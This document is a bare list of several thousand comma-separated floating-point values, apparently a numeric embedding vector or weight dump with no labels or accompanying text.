-0.002968479646369815, 0.011051417328417301, -0.03134475275874138, 0.010281258262693882, 0.018947424367070198, -0.020218560472130775, -0.008352120406925678, -0.012464622966945171, 0.0014945210423320532, -0.002645087195560336, 0.014550783671438694, -0.005368685815483332, -0.005368685815483332, -0.02729206532239914, -0.03675829991698265, 0.007462323643267155, -0.000012340430657786783, -0.004710685461759567, -0.0026133088394999504, 0.007963301613926888, 0.038313575088977814, -0.024555383250117302, 0.013017941266298294, -0.012629123404622078, -0.029834341257810593, -0.036848027259111404, -0.029355794191360474, -0.004340560175478458, -0.04061657562851906, 0.00010374723933637142, -0.013414237648248672, 0.03325893357396126, -0.00824743788689375, 0.02708270214498043, -0.004448980558663607, 0.023448744788765907, 0.005290174391120672, 0.014670420438051224, 0.005447197239845991, 0.028249157592654228, -0.00666973227635026, -0.009040029719471931, -0.020293334499001503, 0.03376739099621773, 0.04552167281508446, 0.0015515353297814727, -0.015732193365693092, 0.011672032065689564, 0.020083969458937645, 0.017840785905718803, -0.010542962700128555, 0.023732881993055344, 0.011544917710125446, 0.020427925512194633, -0.03038765862584114, -0.015477966517210007, -0.011380418203771114, 0.0050621177069842815, -0.011978600174188614, -0.0035928322467952967, 0.03307947888970375, -0.01815483160316944, -0.014939602464437485, -0.001485174405388534, 0.012397327460348606, -0.006037902552634478, -0.02667892910540104, 0.010243871249258518, 0.049379948526620865, 0.022850563749670982, 0.008000687696039677, 0.014939602464437485, -0.0014982597203925252, -0.0355619378387928, 0.008023119531571865, 0.006108936388045549, 0.022835608571767807, -0.005379901733249426, 0.027277112007141113, 0.008696074597537518, 0.04797421768307686, -0.009615779854357243, -0.00013015138392802328, 0.015208784490823746, -0.0038433209992945194, -0.03657884523272514, 0.017930513247847557, -0.002033819677308202, -0.0017608990892767906, -0.004942480940371752, 0.01072989497333765, 0.011686986312270164, -0.0020880301017314196, -0.010243871249258518, -0.00933164358139038, 0.006785630248486996, 0.006946391426026821, 0.017601514235138893, 0.02095133438706398, -0.0022263596765697002, -0.00028880988247692585, -0.006841709837317467, 0.005080810748040676, 0.020054060965776443, 0.02201310731470585, 0.009092370979487896, -0.053507402539253235, -0.021609334275126457, 0.001454330631531775, 0.0019347458146512508, -0.016121013090014458, -0.0050471629947423935, -0.03619002923369408, -0.024809610098600388, -0.04982858523726463, -0.011642122641205788, 0.013227305375039577, -0.006778152659535408, -0.02422638237476349, -0.0220430176705122, -0.02718738466501236, -0.009466234594583511, -0.0183641966432333, -0.004927526693791151, -0.0019758709240704775, 0.029699750244617462, 0.0039554801769554615, 0.011238349601626396, -0.022252380847930908, -0.014423670247197151, -0.0010636429069563746, 0.02937074936926365, -0.018169786781072617, 0.014573215506970882, -0.006303345784544945, 0.019201651215553284, 0.004882663022726774, 0.018962377682328224, -0.020996198058128357, 0.016300467774271965, 0.0300437044352293, 0.011515009216964245, -0.010857008397579193, 0.021205561235547066, 0.0025142349768429995, -0.015066715888679028, 0.020293334499001503, 0.03723684698343277, 0.011350508779287338, -0.017900604754686356, -0.020188651978969574, 0.015253648161888123, -0.0033647753298282623, -0.00183941051363945, 0.00014452177856583148, 0.00907741580158472, 0.01828942261636257, -0.0015225608367472887, -0.01791555993258953, 0.001568359206430614, 0.004650867078453302, 0.003959218971431255, -0.027815476059913635, 0.04019784927368164, -0.027845384553074837, -0.00034302016138099134, 0.0032582241110503674, 0.021474743261933327, 0.033707570284605026, -0.009802712127566338, -0.028159430250525475, -0.005914527457207441, 0.009129757061600685, -0.010909349657595158, -0.012105713598430157, -0.007234266959130764, 0.007608130574226379, -0.023149654269218445, -0.0018618423491716385, -0.0023385188542306423, 0.005477106664329767, 0.01303289644420147, 0.000769692356698215, 0.016330376267433167, 0.014117101207375526, -0.014662942849099636, -0.006471584551036358, -0.021609334275126457, 0.00307876942679286, 0.019605424255132675, -0.010894394479691982, -0.022028062492609024, -0.0047630262561142445, -0.006041640881448984, 0.009099847637116909, 0.016195785254240036, 0.004587310366332531, 0.01918669603765011, 0.0017356632743030787, 0.019874606281518936, -0.008217529393732548, -0.008284824900329113, -0.0076380399987101555, 0.0033572979737073183, -0.013526396825909615, 0.007978255860507488, 0.020218560472130775, -0.031972844153642654, -0.005335038062185049, 0.00044536538189277053, 0.001016909838654101, -0.008561483584344387, -0.010804667137563229, 0.008097892627120018, -0.01631542108952999, -0.0009398004040122032, -0.0009944780031219125, -0.01700333133339882, -0.010827098973095417, -0.0004229335463605821, 0.008718506433069706, -0.014677897095680237, 0.02313469909131527, -0.020756924524903297, -0.014371328987181187, -0.02356838248670101, 0.0028357577975839376, 0.01583687588572502, -0.0355619378387928, -0.011365463025867939, 0.033169206231832504, 0.022357063367962837, -0.012771192006766796, 0.0015515353297814727, -0.014603124931454659, -0.0006528598605655134, -0.01692855916917324, -0.008568961173295975, -0.017766013741493225, 0.02486942894756794, -0.010961689986288548, 0.008239961229264736, -0.003448894713073969, -0.018304377794265747, -0.01504428405314684, -0.02715747430920601, -0.012404805049300194, -0.0052602654322981834, -0.011515009216964245, -0.015971466898918152, -0.005192969925701618, 0.016958467662334442, -0.008053028956055641, 0.023209473118185997, 0.027366839349269867, 0.004348037298768759, -0.011799145489931107, -0.02551247365772724, 0.005772458855062723, -0.0034283320419490337, 0.023762790486216545, 0.007499710191041231, 0.00043999109766446054, -0.00226187682710588, 0.001831933157518506, -0.03137465938925743, 0.042770031839609146, 0.03143448010087013, -0.0001258285774383694, -0.005439720116555691, -0.012053373269736767, 0.005099503789097071, 0.0007785716443322599, 0.015926603227853775, 0.03179338946938515, 0.008254915475845337, -0.003835843876004219, -0.019366150721907616, -0.029116522520780563, -0.013526396825909615, -0.02569192834198475, 0.012853441759943962, -0.008112846873700619, 0.007559528574347496, 0.01487230695784092, 0.021968243643641472, -0.006636084523051977, 0.03472448140382767, -0.01815483160316944, 0.008897961117327213, -0.013324510306119919, 0.01903715170919895, -0.06442423164844513, -0.01665937714278698, -0.026619110256433487, 0.01090187206864357, 0.0046060034073889256, -0.013930169865489006, 0.02806970290839672, 0.04091566801071167, 0.016300467774271965, -0.026275156065821648, 0.01860346831381321, 0.014879783615469933, 0.004650867078453302, -0.002359081292524934, 0.011402850039303303, -0.019096968695521355, -0.017870696261525154, 0.03083629533648491, -0.014139533042907715, -0.009683075360953808, -0.019949378445744514, -0.045222580432891846, 0.0008444651030004025, 0.008995166048407555, 0.0047630262561142445, -0.0028245418798178434, 0.0017590296920388937, -0.011657076887786388, -0.016808921471238136, -0.017257558181881905, -0.015956511721014977, -0.008539051748812199, 0.009458757005631924, 0.005353731568902731, 0.005215401761233807, -0.018947424367070198, -0.021788788959383965, 0.021579425781965256, -0.05081558600068092, -0.008165188133716583, -0.034694571048021317, 0.0022338370326906443, -0.004348037298768759, -0.004905094858258963, -0.0019758709240704775, 0.027680885046720505, -0.0035292753018438816, -0.004650867078453302, 0.006841709837317467, -0.0354423001408577, -0.015687329694628716, -0.02122051641345024, -0.020278379321098328, 0.0306269321590662, 0.017840785905718803, -0.004164844285696745, 0.011903827078640461, 0.025946155190467834, 0.010625212453305721, 0.018753014504909515, -0.003654519794508815, 0.017182786017656326, 0.012374895624816418, -0.005899572744965553, -0.028697794303297997, -0.0002129856002284214, -0.012479578144848347, 0.0007351099629886448, -0.008232483640313148, -0.007267914712429047, 0.0053163450211286545, 0.00722305104136467, 0.013945124112069607, 0.006280913949012756, -0.02670883759856224, -0.0116196908056736, 0.01982974261045456, -0.0066024367697536945, -0.0002923148567788303, -0.00822500605136156, -0.014490965753793716, -0.01171689573675394, 0.014775102026760578, 0.007896006107330322, 0.03284020721912384, -0.009967212565243244, -0.0009169012773782015, -0.006523925345391035, -0.0009528856608085334, -0.01615092158317566, -0.005166799295693636, -0.017810877412557602, -0.014939602464437485, -0.005847231950610876, -0.005716379266232252, -0.0015038676792755723, -0.002740422496572137, -0.028727702796459198, 0.03448520973324776, 0.009017597883939743, 0.018827786669135094, 0.008883006870746613, -0.008120324462652206, -0.010071894153952599, 0.011844009160995483, 0.025796610862016678, -0.004837799351662397, -0.009309211745858192, -0.0037311618216335773, -0.010423325933516026, -0.012950645759701729, 0.009413893334567547, 0.011844009160995483, 0.016345331445336342, 0.02588633820414543, 0.006056595593690872, -0.027650974690914154, 0.022715972736477852, -0.022297244518995285, -0.0017281859181821346, -0.02122051641345024, 0.023523518815636635, 0.02166915312409401, -0.025497520342469215, 0.003777894889935851, 0.019530652090907097, 0.011537441052496433, -0.017212694510817528, 0.0016337853157892823, -0.00243572355248034, 0.03328884392976761, -0.01604623906314373, -0.002602092921733856, 0.007724028546363115, -0.029086612164974213, -0.0062510049901902676, -0.010625212453305721, -0.007047334685921669, -0.0022300982382148504, 0.018618423491716385, -0.023179562762379646, -0.012823532335460186, 0.002065598266199231, 0.056468404829502106, -0.005278958473354578, -0.018080059438943863, 0.010453235357999802, -0.03028297796845436, -0.009630735032260418, 0.0015094756381586194, -0.009144711308181286, -0.012255259789526463, 0.020622333511710167, -0.014161964878439903, 0.009159666486084461, -0.014954556711018085, 0.0007710943464189768, -0.005454674828797579, 0.016375239938497543, -0.015111579559743404, 0.00974289420992136, -0.01938110589981079, -0.004157366696745157, -0.011014031246304512, 0.01846887730062008, 0.03424593433737755, 0.004456458147615194, -0.005249049514532089, -0.02540779300034046, 0.004015298560261726, -0.02129528857767582, -0.032989751547575, 0.01107384916394949, -0.03651902824640274, -0.016135966405272484, 0.010587826371192932, -0.004209707956761122, 0.0008355858735740185, -0.013174964115023613, 0.032989751547575, 0.03448520973324776, -0.023822609335184097, -0.02684342861175537, 0.0035760083701461554, 0.02279074490070343, 0.021579425781965256, 0.020831698551774025, 0.013855396769940853, -0.009264348074793816, 0.012158054858446121, 0.03355802595615387, -0.005435981322079897, -0.01505923829972744, -0.016943512484431267, -0.01428907923400402, 0.005290174391120672, -0.021714016795158386, 0.006606175564229488, 0.0016328506171703339, -0.004026514478027821, -0.000713612767867744, 0.019366150721907616, -0.01047566719353199, -0.036399390548467636, -0.0032956104259938, 0.0026170474011451006, -0.008591393008828163, -0.0011440236121416092, -0.0031142865773290396, -0.002491803141310811, -0.0009416697430424392, 0.005892095621675253, 0.04432530701160431, -0.004303173627704382, 0.0013131970772519708, -0.007596914656460285, -0.0057388111017644405, 0.006396811921149492, 0.04507303610444069, -0.010318644344806671, -0.017960423603653908, 0.01570228487253189, 0.029310930520296097, 0.00975784845650196, 0.004774242173880339, -0.013743237592279911, 0.019500741735100746, 0.006737027782946825, 0.004299435298889875, 0.015074193477630615, -0.008105370216071606, -0.008897961117327213, 0.0018833394860848784, 0.00875589344650507, 0.0039143553003668785, 0.0015347114531323314, 0.007709073834121227, 0.013451623730361462, -0.022985154762864113, -0.000270116695901379, -0.024809610098600388, 0.00376107101328671, -0.01700333133339882, 0.029789477586746216, 0.007137062028050423, 0.004041469190269709, -0.04016793891787529, -0.018812833353877068, 0.0067744143307209015, 0.0011243957560509443, -0.010946735739707947, -0.014917170628905296, 0.02329920046031475, 0.01090187206864357, 0.0039031393826007843, -0.024914292618632317, 0.0033741218503564596, 0.003777894889935851, -0.03630966320633888, -0.0022188823204487562, 0.0024562859907746315, -0.039180938154459, 0.03523293510079384, 0.008793279528617859, -0.00906246155500412, 0.022117789834737778, 0.0076941195875406265, -0.0006280913949012756, 0.03532266244292259, 0.012135623022913933, -0.01903715170919895, -0.02715747430920601, 0.03275047987699509, -0.0028208033181726933, -0.012240304611623287, -0.007873574271798134, 0.0306568406522274, 0.006965084932744503, -0.023957200348377228, 0.01863337866961956, 0.02105601690709591, -0.022805700078606606, -0.023284245282411575, 0.011537441052496433, 0.013264691457152367, -0.011664554476737976, 0.003020820440724492, -0.027920156717300415, -0.018962377682328224, 0.013436669483780861, 0.029146431013941765, 0.015582648105919361, 0.0026058314833790064, 0.0056565613485872746, -0.017182786017656326, 0.019276423379778862, -0.0056416066363453865, 0.02068215236067772, 0.012015986256301403, 0.028054747730493546, -0.002310479059815407, 0.011111236177384853, 0.015373283997178078, -0.0017608990892767906, 0.00016905659867916256, -0.00389192346483469, -0.017347285524010658, 0.01686874032020569, -0.024749791249632835, -0.025303110480308533, 0.01407223753631115, 0.009668121114373207, -0.010116757825016975, 0.001586117665283382, 0.022641198709607124, -0.004075116943567991, -0.006744504906237125, 0.0051443674601614475, 0.005454674828797579, -0.016584603115916252, -0.003071292070671916, 0.0116196908056736, -0.0009926087222993374, 0.01825951412320137, -0.0008729722467251122, -0.013160009868443012, 0.02190842665731907, -0.01903715170919895, 0.0049499585293233395, -0.006172493565827608, 0.0003025961050298065, 0.023388927802443504, -0.009832621552050114, -0.017362240701913834, 0.001423486857675016, 0.016958467662334442, 0.004078855272382498, 0.02463015541434288, 0.00859887059777975, -0.015156443230807781, 0.03496375307440758, 0.023418836295604706, 0.0020356890745460987, -0.01359369233250618, 0.008030597120523453, -0.022117789834737778, 0.015148965641856194, -0.0003983987553510815, 0.007709073834121227, -0.013533873483538628, 0.004138673655688763, -0.00019616172357928008, -0.0008734395960345864, 0.006086504552513361, 0.014603124931454659, 0.005693947430700064, -0.0131674874573946, -0.01761646755039692, 0.021893471479415894, 0.010258826427161694, -0.010999076999723911, -0.016106057912111282, 0.001692668884061277, -0.0008855901542119682, 0.010064416565001011, 0.0022487915121018887, -0.014304033480584621, 0.009555961936712265, -0.004157366696745157, -0.005791152361780405, -0.010378462262451649, 0.0075632669031620026, 0.00822500605136156, -0.001188887283205986, -0.03451511636376381, 0.01887265034019947, 0.0007542704697698355, -0.00177398428786546, 0.0021740186493843794, 0.01962037943303585, -0.006497754715383053, -0.024929245933890343, -0.0017001461237668991, 0.0028413657564669847, -0.02844356745481491, -0.0006594025180675089, -0.026275156065821648, -0.011515009216964245, -0.006957607343792915, -0.005525708664208651, -0.0005715444567613304, -0.0007986667915247381, -0.014976988546550274, 0.002486195182427764, 0.017317377030849457, 0.007013686932623386, -0.0027235986199229956, -0.005843493156135082, 0.02108592540025711, 0.007133323699235916, 0.001293569221161306, 0.007439891807734966, -0.0014477880904451013, 0.010737371630966663, 0.016584603115916252, -0.0028133259620517492, 0.009383984841406345, -0.001694538164883852, 0.005963129457086325, 0.03137465938925743, -0.003605917561799288, 0.014864829368889332, -0.0018693195888772607, 0.010004598647356033, -0.016225693747401237, 0.003342343494296074, -0.0177809689193964, -0.02169906161725521, 0.010281258262693882, -0.005129413213580847, -0.006187447812408209, -0.03681812062859535, -0.005843493156135082, 0.01988956145942211, 0.017332332208752632, -0.005342515651136637, -0.004187276121228933, -0.0009112933184951544, -0.006381857208907604, -0.0116196908056736, -0.018214650452136993, -0.0002846039133146405, 0.01785574108362198, 0.002059990307316184, -0.0029497863724827766, -0.0006075288983993232, -0.00037246194551698864, 0.0014646119670942426, 0.00023506693833041936, 0.019425969570875168, -0.008165188133716583, -0.0006388399633578956, 0.010370985604822636, -0.012404805049300194, 0.010430803522467613, 0.0075071873143315315, -0.007933392189443111, 0.020786834880709648, 0.024375928565859795, -0.0024544165935367346, -0.01604623906314373, -0.004804151598364115, -0.010744849219918251, 0.01333946455270052, 0.012202918529510498, -0.007761415094137192, -0.00824743788689375, 0.015896694734692574, 0.02356838248670101, 0.03358793631196022, -0.0012589867692440748, 0.0042807417921721935, -0.005862186197191477, 0.027920156717300415, 0.0010991599410772324, -0.01461807917803526, 0.003553576534613967, 0.002065598266199231, 0.0066996412351727486, -0.01689864881336689, -0.02473483793437481, -0.0010019553592428565, -0.013481533154845238, -0.003617133479565382, -0.01158230472356081, -0.015418147668242455, 0.0019141832599416375, -0.02071206085383892, -0.014468533918261528, 0.016240648925304413, -0.00222262111492455, 0.002310479059815407, 0.0012150577967986465, 0.028114566579461098, 0.016255604103207588, 0.01751178689301014, 0.010326121933758259, 0.005192969925701618, -0.019201651215553284, 0.0035778777673840523, -0.020263424143195152, -0.02172897197306156, 0.020532606169581413, 0.024435745552182198, 0.011866440996527672, 0.007200619205832481, 0.00028647322324104607, 0.011642122641205788, -0.005028469953685999, -0.00007208564056782052, 0.01652478612959385, 0.003959218971431255, 0.01639019511640072, -0.002635740675032139, 0.026050837710499763, 0.02388242818415165, -0.012202918529510498, -0.017601514235138893, -0.010266303084790707, -0.00037573324516415596, -0.02276083640754223, -0.008793279528617859, -0.020756924524903297, 0.025662019848823547, 0.002749769249930978, 0.014176920056343079, -0.013152532279491425, 0.013967555947601795, 0.019784878939390182, 0.016091102734208107, -0.01972506009042263, 0.002540405374020338, -0.008404460735619068, -0.03158402442932129, 0.001884274184703827, -0.006015470717102289, -0.0034675877541303635, -0.0007893202127888799, -0.024241337552666664, -0.01351144164800644, 0.010236394591629505, -0.00832968857139349, -0.017093058675527573, 0.003884446108713746, -0.005746288690716028, 0.002491803141310811, 0.002110461937263608, 0.02609570138156414, 0.006479061674326658, 0.002749769249930978, -0.018109967932105064, -0.011694463901221752, -0.0054135494865477085, -0.008105370216071606, -0.0015309727750718594, 0.014954556711018085, 0.007226789370179176, -0.024510519579052925, -0.020158743485808372, -0.014229260385036469, -0.01914183236658573, 0.02739674784243107, 0.001615092158317566, 0.023702973499894142, 0.026484519243240356, 0.013444146141409874, -0.0028488431125879288, -0.01214310061186552, -0.015507875010371208, -0.02364315465092659, -0.016509830951690674, -0.005450936034321785, 0.020727016031742096, 0.0251386109739542, 0.026559293270111084, 0.009010120294988155, -0.005249049514532089, -0.000029748469387413934, 0.002106723142787814, 0.019396061077713966, -0.00487144710496068, -0.020756924524903297, 0.019904514774680138, 0.0195605605840683, 0.011948690749704838, -0.00904750730842352, 0.023628199473023415, -0.02510870061814785, 0.023628199473023415, -0.02044287882745266, -0.000255629449384287, 0.0025553598534315825, 0.007985733449459076, -0.0007066028192639351, 0.021070970222353935, -0.009054983966052532, -0.004650867078453302, 0.001266464008949697, 0.0008711029076948762, -0.01618083007633686, -0.006254743319004774, 0.020592425018548965, 0.01272632833570242, 0.003974173683673143, 0.03454502671957016, -0.008845620788633823, 0.012584259733557701, 0.03041756898164749, -0.0037872414104640484, 0.004288219381123781, -0.0011356116738170385, 0.020801788195967674, -0.021100880578160286, 0.000015509511285927147, -0.015687329694628716, 0.02702288329601288, 0.00001094574236049084, -0.0069875167682766914, -0.003918094094842672, -0.023927291855216026, -0.010019552893936634, 0.009428848512470722, 0.016973422840237617, 0.00483032176271081, 0.01078223530203104, 0.0077913240529596806, -0.0035442300140857697, 0.0012711373856291175, 0.0041424124501645565, -0.021743925288319588, -0.0019646550063043833, 0.014932124875485897, 0.0061388458125293255, -0.001111310557462275, -0.008180142380297184, -0.0007323059835471213, 0.0006570658297277987, -0.014505920000374317, 0.014573215506970882, -0.010542962700128555, 0.004837799351662397, 0.014259169809520245, -0.015096625313162804, 0.014894738793373108, -0.023942245170474052, -0.008643734268844128, 0.0033629059325903654, 0.0015833136858418584, 0.006598697975277901, 0.01176923606544733, 0.0137806236743927, 0.01730242185294628, -0.012158054858446121, 0.008748415857553482, 0.001380492583848536, -0.03361784294247627, 0.011851486749947071, -0.027965020388364792, -0.0073127783834934235, 0.0030469910707324743, -0.020323242992162704, 0.013272169046103954, -0.008441847749054432, 0.02060738019645214, -0.006329516414552927, 0.012644077651202679, 0.009870007634162903, 0.0025516212917864323, -0.014685374684631824, 0.0009898047428578138, -0.003652650397270918, -0.012075805105268955, -0.0030507296323776245, -0.020622333511710167, 0.022671109065413475, 0.0018179132603108883, 0.0016141574596986175, -0.006434198003262281, 0.014371328987181187, -0.02558724768459797, -0.02033819817006588, 0.0012328162556514144, 0.005880879703909159, 0.0006285587442107499, 0.010550440289080143, 0.0004530763253569603, -0.00509202666580677, -0.0053163450211286545, 0.0025198429357260466, 0.003835843876004219, -0.008568961173295975, -0.011746804229915142, -0.003824627958238125, 0.015821920707821846, -0.016539739444851875, -0.001758095109835267, -0.010430803522467613, 0.0009402677533216774, -0.011978600174188614, 0.0013589953305199742, -0.013496487401425838, -0.008554006926715374, -0.009944780729711056, -0.0011533702490851283, 0.01206084992736578, 0.012135623022913933, -0.01049062144011259, -0.024136655032634735, -0.029729658737778664, -0.004131196532398462, -0.0007692250073887408, 0.004946219734847546, 0.011627168394625187, -0.016988376155495644, -0.029460476711392403, 0.014827443286776543, -0.018618423491716385, 0.007761415094137192, 0.0025553598534315825, 0.020083969458937645, 0.005361208692193031, -0.01556769385933876, -0.00834464281797409, 0.042231667786836624, 0.006864141672849655, -0.024211427196860313, -0.031045660376548767, -0.032690662890672684, 0.007066028192639351, 0.00790348369628191, 0.010004598647356033, 0.023478655144572258, -0.011260781437158585, -0.02201310731470585, 0.004961174447089434, -0.017736105248332024, 0.013152532279491425, 0.026963066309690475, -0.001401989720761776, -0.0033199116587638855, 0.015657421201467514, -0.012187964282929897, 0.0040115597657859325, 0.01870815083384514, -0.0021291549783200026, 0.02142987959086895, -0.006187447812408209, -0.009122279472649097, -0.0006458499119617045, 0.009496144019067287, 0.002207666402682662, 0.008725984022021294, -0.0002122846053680405, -0.001884274184703827, 0.016719194129109383, 0.00143096421379596, 0.0019478310132399201, 0.004366730805486441, 0.01159725897014141, -0.017945468425750732, 0.0004474683664739132, -0.014049805700778961, 0.02572183683514595, 0.006781891454011202, 0.015866784378886223, -0.0025048882234841585, 0.0006547291995957494, -0.008187619969248772, 0.020158743485808372, 0.007910960353910923, 0.0018487570341676474, -0.011111236177384853, 0.0016066802199929953, 0.001103833201341331, -0.0005556552787311375, -0.0025104961823672056, 0.006658516358584166, -0.024794654920697212, -0.017601514235138893, 0.00143096421379596, -0.00002053330717899371, -0.019635332748293877, -0.01078223530203104, 0.011799145489931107, -0.01785574108362198, 0.03022315911948681, -0.0044938442297279835, -0.012995509430766106, -0.015762103721499443, -0.007036118768155575, 0.014251692220568657, -0.00453870790079236, -0.0007958628120832145, 0.014064760878682137, 0.016539739444851875, -0.017825832590460777, -0.009189574979245663, -0.01716783083975315, 0.009010120294988155, 0.00183941051363945, -0.017661331221461296, 0.015687329694628716, -0.04516276344656944, -0.019844697788357735, -0.01805015094578266, 0.010976645164191723, 0.009645689278841019, 0.008883006870746613, 0.010101803578436375, -0.0021777574438601732, 0.015403193421661854, -0.0022413141559809446, 0.001994563965126872, -0.018558604642748833, 0.012898305431008339, -0.015029329806566238, -0.03046243265271187, 0.012120668776333332, 0.005252788309007883, -0.009937303140759468, -0.007806278765201569, -0.017661331221461296, 0.008905438706278801, -0.011103758588433266, 0.01716783083975315, 0.02534797415137291, -0.01388530619442463, 0.023089835420250893, -0.0016973421443253756, -0.004916310776025057, 0.008606347255408764, 0.017227649688720703, 0.008830665610730648, 0.0060079931281507015, -0.008875529281795025, -0.0026619110722094774, 0.009413893334567547, -0.0022824392654001713, -0.00023284711642190814, 0.026110656559467316, -0.006434198003262281, 0.019635332748293877, 0.006953869014978409, -0.0005869663436897099, -0.006976300850510597, 0.0056565613485872746, 0.023553427308797836, 0.0010019553592428565, -0.0001484940730733797, -0.012718850746750832, -0.004620958119630814, -0.0041984920389950275, -0.0029404398519545794, -0.01767628639936447, 0.020248470827937126, -0.017362240701913834, -0.004725640174001455, 0.01345910131931305, 0.0007682903669774532, -0.01918669603765011, -0.01645001210272312, 0.0037461165338754654, 0.0027292065788060427, 0.0015963990008458495, -0.0030899853445589542, -0.019814787432551384, 0.015388239175081253, -0.012659032829105854, -0.025647064670920372, 0.001533776754513383, -0.0027217294555157423, -0.002217013156041503, -0.006228573154658079, 0.006441675126552582, -0.010400894097983837, -0.009271825663745403, -0.0026675190310925245, -0.008337165229022503, -0.007645517122000456, -0.020966289564967155, 0.030746567994356155, 0.00046382492291741073, 0.02646956592798233, 0.008905438706278801, 0.006680948194116354, -0.010804667137563229, 0.028024839237332344, 0.016988376155495644, 0.01391521468758583, 0.012442191131412983, 0.012240304611623287, -0.00020527465676423162, 0.01204589568078518, 0.006658516358584166, 0.02300010807812214, -0.004632174037396908, -0.019710106775164604, -0.011492577381432056, 0.0190072413533926, -0.01272632833570242, -0.00014276929141487926, -0.016614513471722603, 0.0005463086417876184, -0.04459448903799057, -0.013137578032910824, 0.00508454954251647, 0.0020057798828929663, 0.0019179219380021095, -0.0017422058153897524, -0.011313122697174549, -0.01924651488661766, 0.005918265786021948, -0.012935691513121128, 0.02916138619184494, 0.0067744143307209015, -0.009421370923519135, -0.0018188479589298368, -0.0034376787953078747, -0.01665937714278698, 0.0015720977680757642, 0.009122279472649097, -0.004826583433896303, -0.003080638824030757, -0.007282868959009647, 0.0044377646408975124, 0.02715747430920601, -0.01924651488661766, 0.005664038471877575, 0.00015713968605268747, -0.017691241577267647, 0.01034107618033886, 0.010804667137563229, -0.011126190423965454, -0.0027871555648744106, 0.0013103930978104472, -0.018797878175973892, -0.007645517122000456, -0.009638211689889431, -0.01035603042691946, -0.016225693747401237, -0.000794928171671927, 0.00918209832161665, -0.003499366343021393, 0.01887265034019947, -0.001423486857675016, 0.0017627683700993657, -0.006905266549438238, -0.007282868959009647, -0.010804667137563229, -0.0022319676354527473, 0.010625212453305721, 0.009002643637359142, 0.016405148431658745, -0.008180142380297184, -0.000646784610580653, 0.009144711308181286, 0.010827098973095417, -0.01192625891417265, -0.007484755478799343, 0.011088804341852665, -0.005746288690716028, -0.010535485111176968, -0.011814099736511707, -0.012711373157799244, -0.006269698031246662, 0.010752326808869839, 0.005222878884524107, -0.007604392245411873, -0.006942653097212315, 0.011440236121416092, 0.015388239175081253, -0.018379149958491325, -0.0052004470489919186, -0.006475322879850864, -0.007387551013380289, -0.023942245170474052, 0.00431065121665597, 0.015866784378886223, -0.009204530157148838, -0.003353559412062168, -0.013616124168038368, -0.018887605518102646, 0.003865752834826708, -0.004299435298889875, 0.023658109828829765, -0.008105370216071606, -0.004695730749517679, 0.004314389545470476, -0.017018286511301994, 0.0066024367697536945, -0.02367306314408779, -0.004998560529202223, 0.014558261260390282, -0.017048195004463196, -0.010834576562047005, -0.003936787135899067, -0.0002460491959936917, -0.001884274184703827, -0.0183941051363945, -0.0025161041412502527, -0.0036862981505692005, 0.018917514011263847, 0.02337397262454033, 0.01863337866961956, -0.0026563031133264303, -0.019291378557682037, -0.010946735739707947, -0.008180142380297184, 0.009511098265647888, 0.007069766521453857, -0.0012617907486855984, -0.02238697186112404, -0.000011303542123641819, 0.018887605518102646, 0.009645689278841019, -0.0018992286641150713, 0.010378462262451649, 0.0023534733336418867, -0.002471240470185876, -0.023119745776057243, 0.006624868605285883, 0.006049118470400572, -0.000859886989928782, -0.007671687752008438, -0.0012057111598551273, -0.004052685108035803, -0.030686751008033752, 0.012397327460348606, -0.032481297850608826, -0.0036451732739806175, 0.009698030538856983, -0.0030432522762566805, -0.01119348593056202, -0.00902507547289133, -0.00564534543082118, 0.009967212565243244, 0.0059519135393202305, -0.006692164111882448, -0.015163920819759369, -0.009084893390536308, -0.0027871555648744106, -0.037565845996141434, -0.012479578144848347, -0.010012076236307621, -0.0013038504403084517, -0.007122107781469822, 0.0074249375611543655, -0.00907741580158472, 0.00539111765101552, -0.03583111986517906, 0.009683075360953808, -0.021280335262417793, -0.00011420374357840046, -0.01935119740664959, -0.01866328716278076, 0.0003049327642656863, -0.0013851658441126347, -0.010535485111176968, 0.0015562085900455713, -0.01642010360956192, -0.0065912208519876, -0.0018618423491716385, 0.0014879783848300576, 0.008935348130762577, 0.0013487141113728285, -0.0067183347418904305, -0.007417459972202778, -0.013264691457152367, -0.003344212658703327, -0.019919469952583313, 0.007256698794662952, 0.04097548499703407, 0.0065463571809232235, -0.023314153775572777, -0.010423325933516026, 0.016240648925304413, 0.010625212453305721, -0.009212006814777851, -0.016405148431658745, -0.006976300850510597, -0.02142987959086895, 0.003433940000832081, 0.0017365978565067053, 0.0015440579736605287, 0.013100191950798035, -0.0019758709240704775, 0.01570228487253189, 0.0062510049901902676, 0.02044287882745266, 0.012292645871639252, -0.00021929455397184938, 0.011305645108222961, -0.0031759741250425577, -0.019171742722392082, 0.013952601701021194, -0.00824743788689375, -0.008120324462652206, 0.019949378445744514, -0.005776197649538517, 0.02122051641345024, -0.01802024058997631, -0.005002299323678017, -0.014879783615469933, -0.002364689251407981, 0.015388239175081253, 0.0011842140229418874, -0.008157710544764996, 0.009301734156906605, -0.0033666444942355156, 0.0019141832599416375, -0.02527320198714733, 0.012524441815912724, 0.011911304667592049, -0.014670420438051224, 0.0004304108442738652, 0.008060506545007229, -0.014535829424858093, 0.0354423001408577, 0.014318987727165222, -0.014857351779937744, -0.012980555184185505, -0.017122967168688774, 0.02006901614367962, -0.00410502590239048, -0.002759115770459175, -0.023702973499894142, -0.008583915419876575, 0.029071658849716187, -0.001514148898422718, 0.02521338313817978, 0.012292645871639252, -0.003136718412861228, 0.011186008341610432, -0.003172235330566764, 0.005207924637943506, 0.009563439525663853, -0.0021366323344409466, -0.003876968752592802, -0.0020319505129009485, 0.007537096738815308, 0.012427236884832382, -0.010453235357999802, -0.014147010631859303, 0.018812833353877068, -0.009855053387582302, -0.0367283932864666, 0.004172321408987045, 0.00974289420992136, 0.009944780729711056, -0.010453235357999802, 0.012053373269736767, 0.0004906964022666216, 0.0125693054869771, 0.012202918529510498, 0.00821005180478096, -0.0153284203261137, -0.007110891863703728, 0.005421027075499296, 0.0028750135097652674, -0.032720569521188736, 0.013040373101830482, 0.0008640929590910673, -0.007604392245411873, -0.00030236245947889984, -0.003288133069872856, -0.003230184316635132, -0.020412970334291458, 0.0027142520993947983, 0.007492233067750931, -0.004841537680476904, -0.011776713654398918, -0.009570916183292866, 0.010602780617773533, 0.001543123391456902, -0.0077763693407177925, -0.0056266519241034985, 0.00918209832161665, -0.006751982495188713, 0.00791843794286251, -0.00859887059777975, 0.017975376918911934, 0.0183941051363945, -0.0022861778270453215, 0.014214306138455868, -0.01652478612959385, -0.009899917058646679, 0.0004596189537551254, 0.0006379053229466081, 0.005536924581974745, 0.012068327516317368, 